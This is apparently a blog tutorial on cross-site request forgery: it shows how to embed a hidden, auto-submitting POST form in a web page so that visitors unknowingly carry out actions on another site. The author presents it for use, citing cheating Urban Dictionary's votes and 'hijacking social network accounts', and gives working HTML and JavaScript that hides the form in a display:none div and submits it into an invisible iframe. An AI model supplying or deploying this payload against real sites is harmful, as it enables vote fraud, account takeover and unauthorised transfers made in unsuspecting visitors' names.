Submitting forms automatically can be very useful when you want a visitor of your site to perform an action without ever knowing about it. This could be used for something as innocent as cheating an online vote system or something more nefarious such as hijacking social network accounts.
Back in October 2010, I wrote about cheating urbandictionary with iframes, by having your site's visitors automatically vote up your keyword without ever knowing about it. A couple of weeks after that post, Urbandictionary changed their website to use POST rather than GET, meaning the iframe method would no longer work.
Did that stop me from voting myself up on urbandictionary? Of course not! GET requests are simpler, since you only need to place an iframe on the page, but POST requests can also be easy, when you know how!
Building the form
For this example, I’ll be using a made-up form; you need to swap out the action URL and form fields with those on the site you’re looking to abuse.
The first step is to build a regular HTML form:
<form id="ponyo_form" action="http://www.website.com/transfer" method="POST">
    <input type="text" name="id" value="10" />
    <input type="text" name="transfer_email" value="email@example.com" />
</form>
The code above is enough for a simple proof of concept. But if you were to put it onto a site, you’d realise two things: 1) the form is visible to the user, and 2) when the form is submitted, the page redirects to wherever the form was submitted to.
We get around the redirect issue by adding a ‘target’ attribute to the form which references an iframe. So instead of the whole page having to change, the response is loaded into the iframe instead.
We then place the whole thing inside a div which is set to display:none; so that the visitor can’t see what’s going on.
<div style="display:none;">
    <iframe id="ponyo_frame" name="ponyo_frame"></iframe>
    <form id="ponyo_form" method="POST" action="http://www.website.com/transfer" target="ponyo_frame">
        <input type="text" name="id" value="10" />
        <input type="text" name="transfer_email" value="firstname.lastname@example.org" />
    </form>
    <script>
        document.getElementById("ponyo_form").submit();
    </script>
</div>